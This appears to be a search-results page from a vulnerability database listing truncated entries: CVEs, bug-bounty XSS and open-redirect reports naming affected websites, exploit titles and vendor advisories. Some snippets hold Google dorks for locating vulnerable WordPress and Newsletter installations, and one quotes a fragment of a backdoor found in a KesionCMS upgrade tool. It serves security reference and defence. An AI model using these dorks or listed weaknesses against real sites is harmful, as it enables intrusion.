Lucene search

1439 matches found

NVD
added 2016/02/17 3:59 p.m., 16 views

CVE-2016-2397

The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data...

CVSS 10, AI score 9.7, EPSS 0.06437
Exploits: 0, References: 3

Openbugbounty
added 2016/01/22 8:44 a.m., 15 views

dermaremedies.in XSS vulnerability

Open Bug Bounty ID: OBB-128550; Affected Website: dermaremedies.in; Vulnerable Application: Custom Code; Vulnerability Type: XSS (Cross Site Scripting) / CWE-79; CVSSv3 Score: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N); Remediation Guide: OWASP XSS Prevention Cheat...

AI score 6.4
Exploits: 0

Openbugbounty
added 2016/01/15 5:53 a.m., 12 views

mpsmortgageco.com Open Redirect vulnerability

Open Bug Bounty ID: OBB-124450; Affected Website: mpsmortgageco.com; Vulnerable Application: Custom Code; Vulnerability Type: Open Redirect / CWE-601; CVSSv3 Score: 3.4 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N); Remediation Guide: OWASP Open Redirect Cheat Sheet...

AI score 6.9
Exploits: 0

0day.today
added 2015/12/15 12:0 a.m., 38 views

Wordpress weever-apps-20-mobile-web-apps Shell Upload Exploit

Exploit for php platform in category web applications Exploit Title: Wordpress weever-apps-20-mobile-web-apps Shell Upload Exploit Software Link: http://weeverapps.com/product/cms/ Version:all Version Google dork1: inurl:/wp-content/plugins/weever-apps-20-mobile-web-apps The code in...

AI score 7.1
Exploits: 0

Talos
added 2015/12/08 12:0 a.m., 40 views

Microsoft .NET Manifest Resource Information Disclosure Vulnerability

Talos Vulnerability Report TALOS-2015-0130 Microsoft .NET Manifest Resource Information Disclosure Vulnerability December 8, 2015 CVE Number CVE-2015-6114 Summary An exploitable information leak or denial of service vulnerability exists in the manifest resource parsing functionality of the .NET...

CVSS 4.3, AI score 6.5, EPSS 0.19954
Exploits: 0

BDU FSTEC
added 2015/11/05 12:0 a.m., 3 views

The vulnerability of the Oracle E-Business Suite system’s automation functionality allows a perpetrator to execute any code with administrator privileges.

The vulnerability of the Oracle Applications Technology Stack component in the Oracle E-Business Suite automation system is related to errors in the code. Exploiting this vulnerability allows a malicious actor to execute arbitrary code with administrator privileges remotely...

CVSS 4, AI score 7.5, EPSS 0.03871
Exploits: 0, References: 3, Affected Software: 1

Prion
added 2015/10/31 4:59 a.m., 12 views

Hardcoded credentials

Qolsys IQ Panel aka QOL before 1.5.1 has hardcoded cryptographic keys, which allows remote attackers to create digital signatures for code by leveraging knowledge of a key from a different installation...

CVSS 9.3, AI score 7.4, EPSS 0.0328
Exploits: 0, References: 1, Affected Software: 1

CNVD
added 2015/09/28 12:0 a.m., 2 views

IBC Solar ServeMaster Source Code Vulnerability

ServeMaster TLP+ and Danfoss TLX Pro+ are web-based SCADA systems. A source code vulnerability exists in IBC Solar ServeMaster. An attacker could exploit this vulnerability to obtain source code for executable scripts...

CVSS 5, AI score 7, EPSS 0.01359
Exploits: 0, References: 1

exploitpack
added 2015/09/22 12:0 a.m., 13 views

Apple Mac OSX Regex Engine (TRE) - Integer Signedness Overflow

Apple Mac OSX Regex Engine (TRE) - Integer Signedness Overflow Source: https://code.google.com/p/google-security-research/issues/detail?id=429 The OS X regex engine function tre_tnfa_run_parallel contains the following code: int tbytes; ... if (!match_tags) num_tags = 0; else num_tags = tnfa->num_tags; ... i...

Exploits: 0

BDU FSTEC
added 2015/09/08 12:0 a.m., 3 views

The vulnerability of the Oracle E-Business Suite system for automating business activities allows a perpetrator to breach the confidentiality of protected information.

The vulnerability of the Oracle Applications component in the Oracle E-Business Suite system’s automation activities is related to errors in the code of the AD Utilities sub-component. Exploiting this vulnerability can allow a malicious actor, operating remotely, to compromise the confidentiality...

CVSS 4, AI score 6.6, EPSS 0.01422
Exploits: 0, References: 2, Affected Software: 1

seebug.org
added 2015/09/07 12:0 a.m., 27 views

WordPress History Collection Plugin 1.1.1 download.php Arbitrary File Download

eLouai's Download ScriptERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath"; exit; elseif ! fileexists $filename echo "eLouai's Download ScriptERROR: File not found. USE force-download.php?file=filepath"; exit; ; switch $fileextension case "pdf": $ctype="application/pdf";...

AI score 7
Exploits: 0

Exploit DB
added 2015/08/19 12:0 a.m., 22 views

Adobe Flash - scale9Grid Use-After-Free

Source: https://code.google.com/p/google-security-research/issues/detail?id=380&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for...

AI score 7
Exploits: 0

Cvelist
added 2015/08/11 2:0 p.m., 27 views

CVE-2015-5523

The ParseValue function in lexer.c in tidy before 4.9.31 allows remote attackers to cause a denial of service (crash) via vectors involving multiple whitespace characters before an empty href, which triggers a large memory allocation...

AI score 6.2, EPSS 0.03842
Exploits: 1, References: 14

The Hacker News
added 2015/08/08 1:59 a.m., 27 views

RollJam — $30 Device That Unlocks Almost Any Car And Garage Door

We have talked a lot about car hacking. Recently researchers even demonstrated how hackers can remotely hijack Jeep Cherokee to control its steering, brakes and transmission. Now, researchers have discovered another type of car hack that can be used to unlock almost every car or garage door. You...

AI score 7
Exploits: 0

Packet Storm
added 2015/05/21 12:0 a.m., 28 views

Newsletter 4.3 SQL Injection

Exploit Title : Newsletter 4.3 SQL Injection Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: www.conpresso.de - www.conpresso4.de Google Dork ONE: intext:Module Newsletter 4.3 Google Dork TWO: Module Newsletter 4.3 by www.conpresso4.de Date ...

AI score 0.2
Exploits: 0

Openbugbounty
added 2015/03/30 7:7 a.m., 11 views

mobiles4everyone.com XSS vulnerability

Open Bug Bounty ID: OBB-57103; Affected Website: mobiles4everyone.com; Vulnerable Application: Custom Code; Vulnerability Type: XSS (Cross Site Scripting) / CWE-79; CVSSv3 Score: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N); Remediation Guide: OWASP XSS Prevention Che...

AI score 6.4
Exploits: 0

Microsoft Security Update
added 2015/03/10 5:0 p.m., 6 views

Security Update for Microsoft SharePoint Enterprise Server 2013 (KB2881078)

A security vulnerability exists in Microsoft SharePoint Enterprise Server 2013 that could allow arbitrary code to run when a maliciously modified file is opened. This update resolves that vulnerability...

AI score 3.1
Exploits: 0

Debian
added 2015/02/23 5:0 p.m., 33 views

[SECURITY] [DLA 156-1] samba security update

Package : samba Version : 2:3.5.6dfsg-3squeeze12 CVE ID : CVE-2015-0240 Debian Bug : 779033 Richard van Eeden of Microsoft Vulnerability Research discovered that Samba, a SMB/CIFS file, print, and login server for Unix, contains a flaw in the netlogon server code which allows remote code executio...

CVSS 10, AI score 7.8, EPSS 0.87636
Exploits: 7

seebug.org
added 2015/02/04 12:0 a.m., 22 views

kesion V8.0-to-9.0 upgrade tool has been modified to include a backdoor

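Brief description: If you use the V8.0-to-9.0 upgrade tool, you will be compromised. Details: The KesionCMS V8.0-to-9.0 upgrade tool, downloaded directly from the official site. Proof of vulnerability: the code at the very end of inc/include.asp and index.asp. This code can do quite a lot. " Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject"Scripting.FileSystemObject" Set Lenovo=Lzwudi.OpenTextFileServer.MapPath"."&""&StrLogFile,8,True,...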

AI score 7.1
Exploits: 0

myhack58
added 2015/02/02 12:0 a.m., 1030 views

ThinkPHP 3.0~3.2 SQL injection vulnerability: details and exploitation

0x00 Background: ThinkPHP vulnerabilities have been frequent recently; this exploit belongs to the...

AI score 7.9
Exploits: 0